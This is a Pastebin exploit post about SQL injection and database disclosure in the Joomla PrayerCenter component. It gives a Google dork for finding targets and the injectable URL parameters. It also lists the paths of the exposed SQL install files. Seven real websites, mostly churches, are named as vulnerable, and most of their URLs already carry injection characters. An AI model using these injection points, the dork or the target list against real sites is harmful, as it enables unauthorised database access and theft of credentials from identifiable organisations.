Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Joomla PrayerCenter 3.0.4 SQL Injection / Database Disclosure
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 14/02/2019
- # Vendor Homepage : mlwebtechnologies.com/
- # Software Download Link : github.com/MLWebTechnologies/PrayerCenter/releases
- github.com/MLWebTechnologies/PrayerCenter/archive/3.0.4.zip
- github.com/MLWebTechnologies/PrayerCenter/archive/3.0.3.zip
- github.com/MLWebTechnologies/PrayerCenter/archive/3.0.2.zip
- github.com/MLWebTechnologies/PrayerCenter/archive/3.0.1.zip
- github.com/MLWebTechnologies/PrayerCenter/archive/2.5.2.zip
- # Software Information Link : extensions.joomla.org/extensions/extension/living/religion/prayercenter/
- github.com/MLWebTechnologies/PrayerCenter/releases
- # Software Affected Versions : 2.5.2 - 3.0.1 - 3.0.2 - 3.0.3 - 3.0.4
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_prayercenter''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- CWE-200 [ Information Exposure ]
- # Old Similar CVE : CVE-2018-7314
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- PrayerCenter 3.0.4 and 3.0.2 is now available for Joomla 3.x.
- The PrayerCenter Component provides users of a website with the capability to
- share their prayer concerns with others. Prayer concerns can be posted to the website, sent to
- members of the prayer chain, and sent to the Spiritual director or pastor.
- Users can subscribe to be members of the prayer chain via online form.
- ####################################################################
- # Impact :
- ***********
- * Joomla PrayerCenter 3.0.4 and other versions -
- component for Joomla is prone to an SQL-injection vulnerability because it
- fails to sufficiently sanitize user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application
- and execute arbitrary SQL commands in application`s database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser.
- * This Software prone to an information exposure/database disclosure vulnerability.
- Successful exploits of this issue may allow an attacker to obtain sensitive
- information by downloading the full contents of the application's database.
- * Any remote user may download the database files and gain access
- to sensitive information including unencrypted authentication credentials.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_prayercenter&Itemid=[SQL Injection]
- /index.php?Itemid=[SQL Injection]&option=com_prayercenter
- /index.php?option=com_prayercenter&task=view&Itemid=[SQL Injection]
- /index.php?option=com_prayercenter&task=view_devotion&Itemid=[SQL Injection]
- /index.php?option=com_prayercenter&task=view&Itemid=[ID-NUMBER]&limitstart=[SQL Injection]
- /index.php?option=com_prayercenter&task=confirm&id=[ID-NUMBER]&sessionid=[SQL Injection]
- # Database Disclosure Exploit :
- *******************************
- /admin/sql/install.mysql.utf8.sql
- /admin/sql/uninstall.mysql.utf8.sql
- /administrator/components/com_prayercenter/install.mysql.utf8.sql
- /administrator/components/com_prayercenter/uninstall.mysql.utf8.sql
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] fntchurch.org/index.php?Itemid=64&option=com_prayercenter
- [+] maranathapdx.org/index.php?option=com_prayercenter&task=view&Itemid=79%27
- [+] vieni-con-noi.de/index.php?option=com_prayercenter&task=view&Itemid=1%27
- [+] maranathapdx.org/joomla/index.php?option=com_prayercenter&task=view&Itemid=79&limitstart=8%27
- [+] justasyouare.org/jaya/index.php?option=com_prayercenter&task=view_devotion&Itemid=1%27
- [+] mail.exagora.net/index.php?option=com_prayercenter&Itemid=27%27
- [+] enfraternidad.com/main/index.php?option=com_prayercenter&task=view&Itemid=84&limitstart=30%27
- ####################################################################
- # Example SQL Database Error :
- ****************************
- jos-Warning: Error loading component: com_prayercenter
- Deprecated: Function eregi() is deprecated in /home/enfrater
- /public_html/main/components/com_prayercenter
- /helpers/pc_includes.php on line 793
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment